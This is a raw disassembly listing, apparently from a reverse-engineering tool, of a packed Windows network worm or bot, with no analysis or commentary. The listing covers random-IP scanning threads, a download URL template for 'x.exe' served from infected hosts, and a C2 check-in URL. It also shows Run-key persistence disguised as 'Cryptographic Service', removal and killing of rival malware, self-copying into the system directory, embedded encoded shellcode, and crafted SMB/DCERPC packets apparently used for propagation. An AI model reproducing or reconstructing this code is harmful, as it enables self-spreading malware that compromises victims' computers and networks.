mov byte ptr [ebp+arg_0+2], al
call esi ; dword_314210FC
push offset dword_31425004
mov byte ptr [ebp+arg_0+3], al
call dword_314210D4 ; InterlockedIncrement
push [ebp+arg_0]
call sub_31421801
test eax, eax
pop ecx
jnz short loc_31422624
push [ebp+arg_0]
push offset sub_3142255F
call sub_31421F52
pop ecx
pop ecx
loc_31422624: ; CODE XREF: sub_314225C3+50�j
movzx edi, word_3142500C
call esi ; dword_314210FC
cdq
idiv edi
add edx, edi
push edx
call dword_31421094 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_314225E1
loc_31422642: ; CODE XREF: sub_314225C3+25�j
; sub_314225C3+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_31422647: ; CODE XREF: sub_314225C3+C�j
pop ebp
retn 4
sub_314225C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142264B proc near ; DATA XREF: UPX0:3142281B�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_31421EFB
call sub_3142239E
test eax, eax
jnz loc_31422704
push ebx
mov ebx, dword_31421094
push esi
mov esi, dword_314210FC
push edi
loc_31422671: ; CODE XREF: sub_3142264B+48�j
; sub_3142264B+B0�j
call esi ; dword_314210FC
mov byte ptr [ebp+var_4+1], al
call esi ; dword_314210FC
mov byte ptr [ebp+var_4+3], al
call esi ; dword_314210FC
mov byte ptr [ebp+var_4+2], al
loc_31422680: ; CODE XREF: sub_3142264B+3C�j
call esi ; dword_314210FC
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_31422680
call sub_31421FF9
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_31422671
call sub_31422038
test eax, eax
jz short loc_314226DC
push offset dword_31425004
call dword_314210D4 ; InterlockedIncrement
push edi
call sub_31421801
test eax, eax
pop ecx
jnz short loc_314226E3
push edi
push offset sub_3142255F
call sub_31421F52
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_314226C8: ; CODE XREF: sub_3142264B+8D�j
push edi
push offset sub_314225C3
call sub_31421F52
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_314226C8
jmp short loc_314226E3
; ---------------------------------------------------------------------------
loc_314226DC: ; CODE XREF: sub_3142264B+51�j
push 2710h
call ebx ; dword_31421094
loc_314226E3: ; CODE XREF: sub_3142264B+67�j
; sub_3142264B+8F�j
movzx edi, word_3142500C
call esi ; dword_314210FC
cdq
idiv edi
add edx, edi
push edx
call ebx ; dword_31421094
call sub_3142239E
test eax, eax
jz loc_31422671
pop edi
pop esi
pop ebx
loc_31422704: ; CODE XREF: sub_3142264B+11�j
push 0
call dword_314210D0 ; ExitThread
xor eax, eax
leave
retn 4
sub_3142264B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422712 proc near ; CODE XREF: UPX0:314227E0�p
; UPX0:loc_31422846�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_31421FF9
push eax
call dword_3142115C ; inet_ntoa
mov esi, dword_31421068
push eax
lea eax, [ebp+var_28]
push eax
call esi ; dword_31421068
push dword_31424FFC
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3142111C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_314242BA
call esi ; dword_31421068
push offset byte_314242B8
call dword_31421084 ; lstrlenA
mov byte_314242B8[eax], 0DFh
pop esi
leave
retn
sub_31422712 endp
; ---------------------------------------------------------------------------
loc_3142276E: ; DATA XREF: sub_314223B2+166�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_31425004, ebx
call sub_31422038
mov esi, dword_31421094
mov edi, 1388h
test eax, eax
jnz short loc_3142279C
loc_31422790: ; CODE XREF: UPX0:3142279A�j
push edi
call esi ; dword_31421094
call sub_31422038
test eax, eax
jz short loc_31422790
loc_3142279C: ; CODE XREF: UPX0:3142278E�j
lea eax, [esp+14h]
push ebx
push eax
call dword_31421130 ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_31425008, ebx
pop ebp
mov word_3142500C, 96h
jz short loc_314227D9
mov dword_31425008, 1
mov ebp, 15Eh
mov word_3142500C, 14h
loc_314227D9: ; CODE XREF: UPX0:314227BF�j
call sub_31421FF9
mov ebx, eax
call sub_31422712
cmp ebx, 100007Fh
jz short loc_314227FA
push ebx
push offset sub_3142255F
call sub_31421F52
pop ecx
pop ecx
loc_314227FA: ; CODE XREF: UPX0:314227EB�j
mov dword ptr [esp+10h], 4
loc_31422802: ; CODE XREF: UPX0:31422813�j
push ebx
push offset sub_314225C3
call sub_31421F52
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_31422802
test ebp, ebp
jle short loc_3142282A
loc_31422819: ; CODE XREF: UPX0:31422828�j
push 0
push offset sub_3142264B
call sub_31421F52
pop ecx
dec ebp
pop ecx
jnz short loc_31422819
loc_3142282A: ; CODE XREF: UPX0:31422817�j
; UPX0:31422836�j ...
call sub_31422038
test eax, eax
jz short loc_31422838
push edi
call esi ; dword_31421094
jmp short loc_3142282A
; ---------------------------------------------------------------------------
loc_31422838: ; CODE XREF: UPX0:31422831�j
; UPX0:31422844�j
call sub_31422038
test eax, eax
jnz short loc_31422846
push edi
call esi ; dword_31421094
jmp short loc_31422838
; ---------------------------------------------------------------------------
loc_31422846: ; CODE XREF: UPX0:3142283F�j
call sub_31422712
jmp short loc_3142282A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142284D proc near ; CODE XREF: sub_314229E6+93�p
; sub_31422B67+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3142100C ; RegOpenKeyExA
test eax, eax
jnz short loc_31422880
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31421010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31421014 ; RegCloseKey
loc_31422880: ; CODE XREF: sub_3142284D+1C�j
pop ebp
retn
sub_3142284D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422882 proc near ; CODE XREF: sub_314221C4+33�p
; sub_314229E6+84�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3142100C ; RegOpenKeyExA
test eax, eax
jz short loc_314228AE
push 1
pop eax
jmp short loc_314228D8
; ---------------------------------------------------------------------------
loc_314228AE: ; CODE XREF: sub_31422882+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31421008 ; RegQueryValueExA
test eax, eax
jz short loc_314228CD
push 2
pop esi
loc_314228CD: ; CODE XREF: sub_31422882+46�j
push [ebp+arg_10]
call dword_31421014 ; RegCloseKey
mov eax, esi
loc_314228D8: ; CODE XREF: sub_31422882+2A�j
pop esi
leave
retn
sub_31422882 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314228DB proc near ; CODE XREF: sub_31422A9B+96�p
; sub_31422B67+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421000 ; RegCreateKeyExA
test eax, eax
jz short loc_31422904
push 1
pop eax
jmp short loc_3142292B
; ---------------------------------------------------------------------------
loc_31422904: ; CODE XREF: sub_314228DB+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31421004 ; RegSetValueExA
test eax, eax
jz short loc_31422920
push 2
pop esi
loc_31422920: ; CODE XREF: sub_314228DB+40�j
push [ebp+arg_4]
call dword_31421014 ; RegCloseKey
mov eax, esi
loc_3142292B: ; CODE XREF: sub_314228DB+27�j
pop esi
pop ebp
retn
sub_314228DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142292E proc near ; CODE XREF: sub_314229E6+9F�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_31421084 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_314229E2
loc_3142294E: ; CODE XREF: sub_3142292E+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31422957
dec esi
jns short loc_3142294E
loc_31422957: ; CODE XREF: sub_3142292E+24�j
push 0
push 2
call sub_31422D2C ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_314229E2
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31422D26 ; Process32First
test eax, eax
jz short loc_314229E2
lea esi, [esi+ebx+1]
loc_3142299F: ; CODE XREF: sub_3142292E+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31421104 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_314229CF
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_314210B0 ; OpenProcess
push 0
push eax
call dword_31421060 ; TerminateProcess
loc_314229CF: ; CODE XREF: sub_3142292E+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31422D20 ; Process32Next
test eax, eax
jnz short loc_3142299F
loc_314229E2: ; CODE XREF: sub_3142292E+1A�j
; sub_3142292E+38�j ...
pop esi
pop ebx
leave
retn
sub_3142292E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314229E6 proc near ; CODE XREF: UPX0:3142237B�p
var_13C = byte ptr -13Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
lea eax, [ebp+var_34]
push edi
mov [ebp+var_34], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_30], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_2C], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_28], offset aBotLoader ; "Bot Loader"
mov [ebp+var_24], offset aSystray ; "SysTray"
mov [ebp+var_20], offset aWinupdate ; "WinUpdate"
mov [ebp+var_1C], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_18], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_14], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_10], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_C], offset aWindowsUpdate ; "Windows Update"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Bh
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_31422A56: ; CODE XREF: sub_314229E6+AE�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_13C]
push eax
push ebx
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jnz short loc_31422A8D
push ebx
push edi
push esi
call sub_3142284D
lea eax, [ebp+var_13C]
push eax
call sub_3142292E
add esp, 10h
loc_31422A8D: ; CODE XREF: sub_314229E6+8E�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_31422A56
pop edi
pop esi
pop ebx
leave
retn
sub_314229E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422A9B proc near ; CODE XREF: sub_31422B67+D1�p
; sub_31422B67+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_31422AB0
push [ebp+arg_0]
call dword_31421074 ; DeleteFileA
loc_31422AB0: ; CODE XREF: sub_31422A9B+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_3142108C ; GetSystemDirectoryA
test eax, eax
jz locret_31422B65
push esi
call dword_314210FC ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31421F73
mov esi, dword_31421088
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset dword_314241F0
push eax
call esi ; dword_31421088
lea eax, [ebp+var_78]
push offset dword_314241F8
push eax
call esi ; dword_31421088
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; dword_31421088
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31421050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_31421084 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_314228DB
add esp, 14h
push dword_31424FF4
call dword_3142107C ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31421054 ; WinExec
push 1F4h
call dword_31421094 ; Sleep
push 0
call dword_314210E0 ; ExitProcess
pop esi
locret_31422B65: ; CODE XREF: sub_31422A9B+23�j
leave
retn
sub_31422A9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422B67 proc near ; CODE XREF: UPX0:31422380�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31421048 ; GetModuleFileNameA
test eax, eax
jz loc_31422CA0
and dword_31425010, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jz short loc_31422BED
call dword_314210FC ; rand
push 0Ah
mov ebx, offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_31421F73
pop ecx
pop ecx
push ebx
call dword_31421084 ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_314228DB
add esp, 14h
jmp short loc_31422BFC
; ---------------------------------------------------------------------------
loc_31422BED: ; CODE XREF: sub_31422B67+4D�j
lea eax, [ebp+var_20]
push eax
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
call dword_31421068 ; lstrcpyA
loc_31422BFC: ; CODE XREF: sub_31422B67+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_31422882
add esp, 14h
test eax, eax
jz short loc_31422C42
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_314228DB
lea eax, [ebp+var_84]
push eax
push 0
call sub_31422A9B
add esp, 1Ch
jmp short loc_31422CA0
; ---------------------------------------------------------------------------
loc_31422C42: ; CODE XREF: sub_31422B67+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3142104C ; lstrcmpiA
test eax, eax
jnz short loc_31422C8B
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jnz short loc_31422CA0
push ebx
push edi
push esi
mov dword_31425010, 1
call sub_3142284D
add esp, 0Ch
jmp short loc_31422CA0
; ---------------------------------------------------------------------------
loc_31422C8B: ; CODE XREF: sub_31422B67+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_31422A9B
pop ecx
pop ecx
loc_31422CA0: ; CODE XREF: sub_31422B67+1F�j
; sub_31422B67+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_31422B67 endp
; =============== S U B R O U T I N E =======================================
sub_31422CA5 proc near ; CODE XREF: sub_314211A0+CA�p
; sub_314215C7+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_31421044 ; VirtualAlloc
retn
sub_31422CA5 endp
; =============== S U B R O U T I N E =======================================
sub_31422CB9 proc near ; CODE XREF: sub_314211A0+10B�p
; sub_314215C7+C0�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31421040 ; VirtualFree
retn
sub_31422CB9 endp
; ---------------------------------------------------------------------------
align 10h
loc_31422CD0: ; DATA XREF: sub_31421422+A�o
; sub_314223B2+A�o
jmp dword ptr loc_31421100
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CD6 proc near ; CODE XREF: sub_31421801+128�p
; sub_31421801+134�p ...
jmp dword_314210F8
sub_31422CD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CDC proc near ; CODE XREF: sub_31421801+9C�p
; sub_31421801+C5�p ...
jmp dword_314210F4
sub_31422CDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CE2 proc near ; CODE XREF: sub_31421801+93�p
; sub_31421801+B2�p ...
jmp dword_314210F0
sub_31422CE2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31422CF0 proc near ; CODE XREF: sub_31421801+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31422D10
loc_31422CFC: ; CODE XREF: sub_31422CF0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31422CFC
loc_31422D10: ; CODE XREF: sub_31422CF0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31422CF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D20 proc near ; CODE XREF: sub_3142292E+AB�p
jmp dword_31421064
sub_31422D20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D26 proc near ; CODE XREF: sub_3142292E+64�p
jmp dword_3142105C
sub_31422D26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D2C proc near ; CODE XREF: sub_3142292E+2D�p
jmp dword_31421058
sub_31422D2C endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 4B3h dup(0)
dword_31424000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_31421422+112�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314215C7+84�o
align 10h
byte_31424080 db 0 ; DATA XREF: sub_314216A2+1B�r
off_31424081 dd offset dword_314241E4 ; DATA XREF: sub_314216A2+23�r
align 2
dd offset dword_314241D4
dw 0C401h
dd 1314241h, 314241B4h, 4241A000h, 41900131h, 80013142h
dd 314241h, 31424174h, 42416800h, 41580131h, 48003142h
dd 1314241h, 3142413Ch, 42417400h, 41D40131h, 30003142h
dd 314241h, 314241D4h, 42412001h, 41480031h, 10013142h
dd 314241h, 31424130h, 42410001h, 40F80131h, 74003142h
dd 314241h, 31424130h, 2E767663h, 7572h, 2E777777h, 6C646572h
dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h
dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h
dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh
dd 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h
dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dword_314241D4 dd 72617778h, 6A632E65h, 656E2E62h, 74hdword_314241E4 dd 617A616Dh, 616B6166h, 75722Ehdword_314241F0 dd 6578652Eh, 0 ; sub_3142207E+55�o ...
dword_314241F8 dd 5Ch ; sub_31422A9B+56�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314211A0+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31421316+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31421316+C�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_31421422+34�o
align 10h
aHttpS db 'http://%s',0 ; DATA XREF: sub_314215C7+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=19.2&cnt=%s',0
; DATA XREF: sub_314215C7+57�o
align 8
byte_314242B8 db 0EBh ; DATA XREF: sub_31421801+24E�o
; sub_31421801+260�o ...
db 58h
word_314242BA dw 7468h ; DATA XREF: sub_31422712+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_31424580 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_31421801+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_3142460C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_314246B8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_31424798 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_31421801+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_314247FC dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_31424868 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_3142490C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_3142498C dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
